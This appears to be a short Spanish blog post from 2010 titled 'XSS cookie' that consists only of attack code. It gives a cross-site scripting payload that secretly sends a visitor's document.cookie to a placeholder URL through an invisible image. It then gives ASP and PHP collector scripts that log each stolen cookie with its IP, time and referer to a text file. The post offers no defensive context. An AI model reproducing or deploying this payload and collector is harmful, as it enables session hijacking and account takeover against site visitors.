| Mobile| RSS

XSS cookie

sábado, 22 de mayo de 2010 | Tags: | 0 Comentarios

script>document.write('<img src="http://url/news.asp?msg='+document.cookie+'" width=0 height=0 border=0 />');</script>

news.asp:
<%
msg=Request.ServerVariables("QUERY_STRING")    
testfile=Server.MapPath("cook.txt")    
set fs=server.CreateObject("scripting.filesystemobject")    
set thisfile=fs.OpenTextFile(testfile,8,True,0)    
thisfile.Writeline(""&msg& "")    
thisfile.close    
set fs = nothing    
%>

PHP:
<?php 
$cookie = $_GET['c']; 
$ip = getenv ('REMOTE_ADDR'); 
$time=date("j F, Y, g:i a"); 
$referer=getenv ('HTTP_REFERER'); 
$fp = fopen('cook.txt', 'a'); 
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$time. '<br> Referer: '.$referer.'<br><br><br>'); 
fclose($fp); 
?>

0 Respondiendo

Publicar un comentario

Ciber Protesta

Blog Archive

Labels

Blogumulus by Roy Tanck and Amanda Fazani

Twitter